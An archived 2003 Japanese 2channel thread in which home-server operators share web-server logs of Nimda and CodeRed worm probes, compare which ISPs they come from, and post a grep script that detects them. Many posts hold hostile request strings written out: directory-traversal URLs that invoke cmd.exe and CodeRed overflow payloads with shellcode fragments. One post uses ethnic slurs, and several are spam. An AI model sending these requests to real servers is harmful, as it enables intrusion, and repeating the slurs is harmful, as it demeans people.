2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

この鯖ワームにやられてます

1 :DNS未登録さん:03/02/08 17:15 ID:???
自宅で鯖も善いけど、管理はちゃんとしようよ。
ログを汚すだけではなく、ネットワーク資源のムダ使いの
CodeRedやNimdaその他のワームにやられてる鯖を教え合おう!!

管理者がこの板みて、対処を期待する。

2 :DNS未登録さん:03/02/08 17:18 ID:OJy9I2w0
2 get!!

おー鯖管理に関する話題だな。
でもな、ワームによってはIP詐称してるのもアルからな
そういうのはどうする>>1 ?


3 :DNS未登録さん:03/02/08 17:31 ID:???
IP詐称されてるってのが分かるだけでも当人?としては
いいかも。やっぱ気持ち悪いじゃん。

ところで3ズサ━━━━⊂(゚Д゚⊂⌒`つ≡≡≡━━━━!!


4 :DNS未登録さん:03/02/08 17:35 ID:???
ラストクリスマスキタ━━━━━━(゚∀゚)━━━━━━━!!!!!

5 :DNS未登録さん:03/02/08 17:51 ID:???
218.86.248.174 [08/Feb/2003:08:26:23 +0900] - > GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
218.114.46.157 [08/Feb/2003:10:57:07 +0900] - > GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0

知らんなら本人に気づいて欲しいという意味でも晒しとくよ

6 :DNS未登録さん:03/02/08 18:11 ID:4rLBdIa0
無駄。apache のlogに記録されない様にするのがいい。


7 :DNS未登録さん:03/02/08 18:12 ID:???
>>5
あんたYahooBBかい?

8 :つっこんでおいてあげよう:03/02/08 18:12 ID:???
>>4
それはワム

9 :DNS未登録さん:03/02/08 18:27 ID:mqoXGeCK
>>7
あんた馬鹿の一つ覚えを繰り返してるゴミ送信主かい?


10 :DNS未登録さん:03/02/08 18:39 ID:rLjflOVM
>>6
どうやってやるんですか?

11 :DNS未登録さん:03/02/08 18:44 ID:???
>>9
うちもYahooBBで、YahooBBにしてから(IPアドレスが218.*.*.*になってから)Nimdaの攻撃が激増したから聞いているだけなんだけど・・・

12 :DNS未登録さん:03/02/08 19:09 ID:???
>>10
ここでも嫁
ttp://www.zdnet.co.jp/help/tips/linux/l0324.html

13 :DNS未登録:03/02/08 20:54 ID:???
>>4
>>8
ワラタ

14 :DNS未登録さん:03/02/08 21:25 ID:???
こういうのってプロバイダに通報した方がいいの?

15 :DNS未登録さん:03/02/08 21:40 ID:OJy9I2w0
>>11
確かに、YahooBB(218.*.*.* と219.*.*.*がほとんど43.*.*.* 220.*.*.*は少ない)
はNimdaの攻撃が多い。www.bbtec.netはApache使ってるし
DNS(dns**.bbtec.net)はBIND8使ってるから、一般ユーザが感染していると考えられる。
常時接続で、知らぬ間にIIS探ししてるんだよね。1スキャンで16ヒットするから
ログ解析ツールwebalizer,mrtgその他を使うとすぐ分る。
根本解決は管理者に教えてあげることだけど、めんどくさく、難しい事も多い。
逆引き出来れば良い方で、IP偽ってるのも結構ある。
対処方法は、>>6 が言っているようにログに残らないようにするのが簡単。

16 :DNS未登録さん:03/02/09 10:08 ID:???
仮にも管理者が決まっている鯖なら、いくらぐーたらでも
さすがにCodeRed/Nimda/Slammer級のワームについては対策されてると思いたいが。。。

今ごろになってもNimdaやらまきちらしてるのは
知らないうちにIISが動いてて持ち主も把握してないようなマシンだろう。
そういう「持ち主」はいても「管理者」はいないようなマシンは
リプレースされるまでそのままだと思うよ。


17 :DNS未登録さん:03/02/10 00:10 ID:???
久々にNIMDA来た
219.180.170.51 - - [09/Feb/2003:22:38:17 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 447

18 :DNS未登録さん:03/02/10 03:48 ID:j1IeEeCl
久々にCodeRed来た
80.204.44.179 - - [10/Feb/2003:00:34:17 +0900] "GET /default.ida?NNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u5
31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 309 "-" "-"


19 :DNS未登録さん:03/02/10 04:21 ID:QfHjKzWg
ぷららのDDNSだけどぷららも結構多いよ。
nslookupで引くとほとんどがぷららさん・・・

20 :DNS未登録さん:03/02/10 15:20 ID:???
>19 いまだにnslookup

( ´,_ゝ`)フ゜ッ

21 :名無しさん@カラアゲうまうま:03/02/10 15:48 ID:???
ネームサーバをさせるわけでもないのに、
わざわざ dig や host のために bind for win をインストールしたり、
dnsip やら dnsipq やらのためにわざわざパッチ当てて
djbdns をコンパイルするのはアレだし。
この程度のことならば nslookup でも特に問題にならんと思うんだけど、
他に Windows で使えるいいツール知らんかい? >>20


22 :DNS未登録さん:03/02/10 15:53 ID:rOagKP5I
218.200.211.35 - - [10/Feb/2003:07:28:37 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 318 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:41 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:04 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:05 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:06 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 373 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:08 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:09 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:11 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"


23 :DNS未登録さん:03/02/10 16:05 ID:rOagKP5I
自動的にワームからのアクセスがあったときに

root@アクセス元IPアドレス

とかに警告メール出すようなソフトだれか作ってくり。

24 :名無しさん@カラアゲうまうま:03/02/10 16:08 ID:???
>>23
http://reuven.lerner.co.il/projects/Apache-CodeRed-1.07.tar.gz

25 :DNS未登録さん:03/02/10 16:25 ID:rOagKP5I
>>24
make test
PERL_DL_NONLAZY=1 /usr/bin/perl -Iblib/arch -Iblib/lib -I/usr/libdata/perl/5.00503/mach -I/usr/libdata/perl/5.00503 test
.pl
1..1
Can't locate warnings.pm in @INC (@INC contains: blib/arch blib/lib /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.0
0503 /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.00503 /usr/local/lib/perl5/site_perl/5.005/i386-freebsd /usr/loc
al/lib/perl5/site_perl/5.005 .) at blib/lib/Apache/CodeRed.pm line 4.
BEGIN failed--compilation aborted at blib/lib/Apache/CodeRed.pm line 4.
BEGIN failed--compilation aborted at test.pl line 10.
*** Error code 2

Stop in /tmp/Apache-CodeRed-1.07

26 :DNS未登録さん:03/02/10 16:29 ID:8rUySNNC
http://bbs.1oku.com/bbs/bbs.phtml?id=rantyan
★ココだ★ココだ★

27 : :03/02/10 17:38 ID:???
>>23
警告メールは、やっぱり、

「回線切って、首つって、氏ね」

みたいなの?


28 :DNS未登録さん:03/02/11 11:43 ID:???
>>19
それってぷららのDDNS使ってるからじゃない?
Nimdaはご近所さん攻撃するものだし。

29 :DNS未登録さん:03/02/11 19:06 ID:???
確かにNimdaは感染したマシンのセグメント付近に攻撃するよね。
所詮DDNSは、とりあえず立てましたって人が使うから管理甘いのよね。

30 :DNS未登録さん:03/02/12 03:34 ID:???
>>23
こんだけ騒がれてるのにいまだにワームをまきちらかしてるような奴が
そんなの読むわけないと思われ。
だいたいWindowsが多いんだからrootに出してもまず無意味。
net send(smbclient -M)を送り返すとかしたほうがまだしも効果があるだろう。


31 :DNS未登録さん:03/02/12 22:58 ID:e3CqtLIi
ピコ郎

32 :DNS未登録さん:03/02/13 19:37 ID:???
久々だな。
62.217.134.16 - - [13/Feb/2003:19:21:53 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 226

33 :DNS未登録さん:03/02/13 21:11 ID:0FAikRrM
最近codered多くない? しばらくこなかったけど
最近1日3回位くるYO ちなみに屋不ーBB


34 :DNS未登録さん:03/02/13 21:32 ID:5F3nLZxs
[Thu Feb 13 18:32:04 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..タッ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%5c/winnt/system32/cmd.exe
[Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%2f/winnt/system32/cmd.exe

俺みたいにISDNで鯖をやってるようなヤシの所にも来るのか・・・

35 :32:03/02/13 21:44 ID:???
>>33
うちもYahoo!BBだよ。
多すぎってほどじゃないけど、やっぱり日に2〜5件くらいはくるですねぇ。

36 :32:03/02/13 21:45 ID:???
……と、access_logをgrepして気が付きますた。
全然久々じゃないじゃないか (w

37 :DNS未登録さん:03/02/15 17:01 ID:Dzt44uVK
お前らみたいな糞坊が鯖なんか立てるから、ウィルスが万円して逝くんだよ
もっと勉強してから立てれ

38 :◆5PTORPEDog :03/02/15 17:07 ID:LDMrKlpL
漏れの所も…

その1
[Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/scripts
[Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/MSADC
[Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/c
[Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/d

その2
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/scripts
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/MSADC
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/c
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/d

両方ともにahoo!BB。
頼むよ。漏れもahoo!BBなんだけどさ(涙

39 :DNS未登録さん:03/02/23 01:57 ID:???
一週間で1000リクエストほどワーム来るね

40 :DNS未登録さん:03/02/24 10:42 ID:???
うちもぷららのDDNS使ってますが、サーバ開通直後に
わんさか来たので、ログの一部をサポートセンターに
送って対処をお願いしたら、それ以後は随分少なく
なりましたよ。まあ、偶然かもしれませんが...


41 :40:03/02/24 16:56 ID:???
やっぱり偶然でした(T_T)

どうやら、土日はお休みで電源が落ちていただけの模様です。
ただのパソコンなんだろうな...

42 :DNS未登録さん:03/02/28 14:41 ID:???
友人のケースでは、相手を特定して電話してやっと解決したってケースがありました。
相手は設計事務所のサーバーだったそうです。 それだから連絡先がわかった、と
いうことでもありますが。 プロバイダーはシカトを決め込んでいたそうです。

43 :DNS未登録さん:03/03/08 08:13 ID:???
少々のワームやウイルスはいちいちかまってられないが、
前OCNユーザーから1日200通のウイルスメールがきたときは
さすがにたまりかねてOCNに連絡したよ…

鯖とは関係ない話だがな…


44 :飛石3連休 ◆8772606082 :03/03/09 10:43 ID:q66m7LbT
218.9.76.4 - - [07/Mar/2003:22:22:26 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

218.11.16.6 - - [06/Mar/2003:21:32:04 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

218.4.144.106 - - [06/Mar/2003:21:09:25 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

218.12.182.39 - - [06/Mar/2003:07:46:12 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

いい加減蝋人形にしちゃうよ?!

45 :DNS未登録さん:03/03/09 12:08 ID:???
218.9.6.222 - - [08/Mar/2003:12:13:13 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

218.18.18.72 - - [08/Mar/2003:15:38:43 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

218.27.89.97 - - [08/Mar/2003:18:23:39 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

218.6.243.62 - - [08/Mar/2003:19:01:17 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

218.244.75.70 - - [08/Mar/2003:20:31:32 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

いい加減蝋人形にしちゃうよ?!

46 :DNS未登録さん:03/03/09 12:24 ID:???
本日のニムダアクセス
韓国 61.250.216.1
中国 61.132.75.252

47 :DNS未登録さん:03/03/09 13:45 ID:+7NxEJAT
#!/bin/sh

if [ $1 ] && [ -f $1 ]; then
ACCESS_LOG=$1
elif [ -f /usr/local/apache/logs/access_log ]; then
ACCESS_LOG=/usr/local/apache/logs/access_log
else
echo "usage: $0 path_to_access_log"
exit 1
fi

egrep "cmd.exe|root.exe|NNNNNN" $ACCESS_LOG \
| awk '{ print $4,$5,$1; }' \
| sort -k 3,3 -u | sort -k 1,1 \
| sed -e 's/^/スキャン歓迎: /g' | more

exit 0

48 :DNS未登録さん:03/03/09 14:24 ID:???
ワラタ

49 :DNS未登録さん:03/03/10 22:18 ID:???
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

上のようなログがたくさんあるんですが、404じゃなくて302なのです・・・。
なんでかわかるかた教えてくださいm(__)m

50 :DNS未登録さん:03/03/10 22:20 ID:t9dgL7sB
これはどうなのかな。。。

[Sun Mar 09 23:10:05 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ/winnt/system32/cmd.exe
[Sun Mar 09 23:10:07 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..タッ/winnt/system32/cmd.exe
[Sun Mar 09 23:10:09 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ・winnt/system32/cmd.exe
[Sun Mar 09 23:10:15 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%5c/winnt/system32/cmd.exe
[Sun Mar 09 23:10:20 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%2f/winnt/system32/cmd.exe

51 :DNS未登録さん:03/03/10 22:32 ID:d65/2I7l
  ∋8ノノハ.∩
   川o・-・)ノ <先生!こんなのがありました!
__/ /    /   
\(_ノ ̄ ̄ ̄\
||ヽ|| ̄ ̄ ̄ ̄||
 ...|| ̄ ̄ ̄ ̄||
http://saitama.gasuki.com/saitama/

52 :DNS未登録さん:03/03/11 02:12 ID:???
うちも、チョンとチャンコロばっかりです。

http://www.arearesearch.co.jp/ip-kensaku.html

今日は珍しく、アメリカのDSL回線とアラブ首長国連邦があった

53 :DNS未登録さん:03/03/11 06:40 ID:???



       ま    た    中    国    か





54 :DNS未登録さん:03/03/12 23:51 ID:???
default.ida?XXXXX...増殖中。
0件: 5/Mar
0件: 6/Mar
0件: 7/Mar
0件: 8/Mar
0件: 9/Mar
0件: 10/Mar
12件: 11/Mar
48件: 12/Mar

55 :DNS未登録さん:03/03/13 15:32 ID:EzD2j/Xg
上にもあるが、最近こんなヤシが来るんですがこれもCODEREDだよね?
2003/03/13(13:14:12) W-SV 219.*.***.*** [80] 404 237 "GET /
default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXY090V858\bd3W801Y090
V858\bd3W801Y090V858\bd3W801Y090Y090X190P0c3P003Xb00U31bU3ffP078
P000P0=a HTTP/1.0"
今まで見たNNNってヤシと違うもんだから気になって、、


56 :DNS未登録さん:03/03/13 15:34 ID:j2B84i1p
http://www.pink-angel.jp/betu/linkvp2/linkvp.html
★その目で確認すべし!!★超おすすめ★

57 :DNS未登録さん:03/03/13 15:56 ID:???
>>52
国際的ですね(w

58 :山崎渉:03/03/13 16:55 ID:???
(^^)

59 :DNS未登録さん:03/03/13 22:31 ID:C6UKAtSK
ほぼ毎日、韓国、中国。たまに日本。

60 :DNS未登録さん:03/03/14 03:03 ID:???
韓国と中国がものすごく多い。
あと、日本国内だと普通の企業とか。

61 :DNS未登録さん:03/03/14 11:03 ID:???
ここ数日はCodeRed IIが多いですね、国内外を問わず。
荒らしてくれるのは、
愛知、神奈川、埼玉あたりが多いです。

62 :DNS未登録さん:03/03/14 23:03 ID:SKFFyD7J
我々に直接的な害はないんですがね。
見てて気持ち悪いですよ。

63 :DNS未登録さん:03/03/15 23:45 ID:7XBHLTMt
こんなの出てた
61.191.128.106 - - [15/Mar/2003:20:26:20 +0900] "GET /default.ida?XXXX
XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
61.48.32.168 - - [15/Mar/2003:20:33:57 +0900] "GET /default.ida?XXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
61.83.171.22 - - [15/Mar/2003:22:54:03 +0900] "GET /default.ida?XXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276


64 :DNS未登録さん:03/03/16 00:41 ID:???
CodeRedII多いなぁ
219.168.40.15 - - [15/Mar/2003:06:09:38 +0900] "GET /default.ida?XXXXXXXXXXXXXX
219.93.193.170 - - [15/Mar/2003:12:12:01 +0900] "GET /default.ida?XXXXXXXXXXXXX
219.94.102.51 - - [15/Mar/2003:16:44:21 +0900] "GET /default.ida?XXXXXXXXXXXXXX
219.145.159.175 - - [15/Mar/2003:17:57:31 +0900] "GET /default.ida?XXXXXXXXXXXX
219.138.9.227 - - [15/Mar/2003:19:18:09 +0900] "GET /default.ida?XXXXXXXXXXXXXX


65 :DNS未登録さん:03/03/16 12:03 ID:YmIrJiRn
218.64.67.194 - - [15/Mar/2003:18:26:32 +0900] "GET /default.ida?XXXXXXXXX
流行ってるね。

66 :DNS未登録さん:03/03/16 21:36 ID:/QhqGxAD
設置者は居ても、管理者が居ない鯖が多いということで

67 :tantei:03/03/16 21:52 ID:???
★あなたのお悩み解決致します!!
●浮気素行調査
彼氏、彼女、妻、夫の浮気を調査致します!!
●盗聴器盗撮機発見
あなたの部屋に誰かが仕掛けているかも!!
●行方調査
行方不明になっている家族の消息を調査致します!!
●電話番号から住所割り出し
一般電話、携帯から住所を割り出し致します!!
●ストーカー対策
社会問題ともなっているストーカーを撃退致します!!
その他人生相談からどんなお悩みでも解決いたします!!
 直通  090−8505−3086
URL  http://www.h5.dion.ne.jp/~grobal/
メール  hentaimtt@k9.dion.ne.jp
   グローバル探偵事務局 



68 :俺の鯖も・・・しつこく来る:03/03/16 22:09 ID:???
003/03/16(20:32:54) W-SV 61.199.98.125 [80] 200 950 "GET /kiyaku.html HTTP/1.1"
2003/03/16(20:33:31) W-SV 61.251.250.14 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:33) W-SV 61.251.250.14 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:36) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:36) W-SV 61.251.250.14 [80] 403 262 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:37) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:37) W-SV 61.251.250.14 [80] 403 275 "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:41) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:41) W-SV 61.251.250.14 [80] 403 275 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:44) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/msadc/..\../..\../..\/..チ../..チ../..チ../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:44) W-SV 61.251.250.14 [80] 403 291 "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:45) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..チ../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:45) W-SV 61.251.250.14 [80] 403 263 "GET /scripts/..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"


69 :DNS未登録さん:03/03/18 15:13 ID:???
>68
規約ってなんだっ

70 :DNS未登録さん:03/03/19 04:21 ID:???
CodeRedIIウザー(´Д`;
219.138.52.14 - - [19/Mar/2003:00:45:01 +0900] "GET /default.ida?
219.234.238.253 - - [18/Mar/2003:18:09:40 +0900] "GET /default.ida?
219.215.44.61 - - [18/Mar/2003:20:44:08 +0900] "GET /default.ida?
219.138.1.212 - - [19/Mar/2003:01:34:27 +0900] "GET /default.ida?
219.68.217.243 - - [19/Mar/2003:01:50:51 +0900] "GET /default.ida?

中国でもWindowsServer使ってるのか・・・
テストのため1日晒してただけで結構来るねぇ。

71 :DNS未登録さん:03/03/20 01:39 ID:???
迷惑。マシンごと逝ってくれ、とくに220.13.136.85

YahooBB220013136085.bbtec.net - - [18/Mar/2003:04:00:21 +0900] "GET /default.ida?XXXXXXXXX
YahooBB220013232179.bbtec.net - - [18/Mar/2003:07:09:43 +0900] "GET /default.ida?XXXXXXXXX
YahooBB220027008006.bbtec.net - - [19/Mar/2003:09:17:43 +0900] "GET /default.ida?XXXXXXXXX


72 :DNS未登録さん:03/03/20 10:39 ID:???
>>71
うちも220.*.*.*からばかり来てるな。
まだそれほど多いと感じて無いけど。

73 :404.HDML ◆StMXML.EXE :03/03/23 04:15 ID:???
61.236.229.237からCodeRedが北んで、何かと思ってアクセスしたら、
www.okxa.comというドメインのサイトですた。

何、ココ?エロゲサイト?

74 :DNS未登録さん:03/03/25 13:12 ID:kTD0oBas
うちは、1日に、CodeRedが34回、Nimdaが32回なんてのも、
普通だす。
なんとかしたいのでつが・・・
サーバーは、BIGLOBEです。。

75 :DNS未登録さん:03/03/25 15:51 ID:???
>>73
下にメアド書いてあるじゃん。とりあえず英語と中国語?で文句言ってみれば?

76 :DNS未登録さん:03/03/26 06:30 ID:???
まぁ、MicroSoftのWebサイトにCodeRed.F対策のアナウンスが挙がってるんだから
身に覚えのある人はパッチをあてて欲しいですね

77 :DNS未登録さん:03/04/02 23:02 ID:???
最近やたらCodeRedII多くないかい?
218.***.***.***から目茶苦茶(100/day程度)来るんだけど


あーうぜー

78 :DNS未登録さん:03/04/02 23:14 ID:???
初めて見た。

210.220.73.20 - - [02/Apr/2003:06:56:31 +0900] "GET / HTTP/1.1" 200 765 "-" "-"
210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.printer HTTP/1.1" 404
1059 "-" "-"
210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u
0000%u0000%u838b%u0094%u0000%u408・・・以降文字化けで表示できない

79 :DNS未登録さん:03/04/03 00:21 ID:???
SYN Flood Attackしてくる香具師もなんとかしる

80 :DNS未登録さん:03/04/05 17:49 ID:???
>78
ウチにも来たよ
211.189.57.126から
最初はイタズラされてるだけあかと持ったんだけど、新しいワームかね?
相手はコーリャンのIISでした。

81 :DNS未登録さん:03/04/06 10:36 ID:???
211.158.61.191 - - [06/Apr/2003:05:12:15 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:20 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:25 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:31 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:36 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:41 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:47 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:52 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:57 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:02 +0900] "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:08 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194
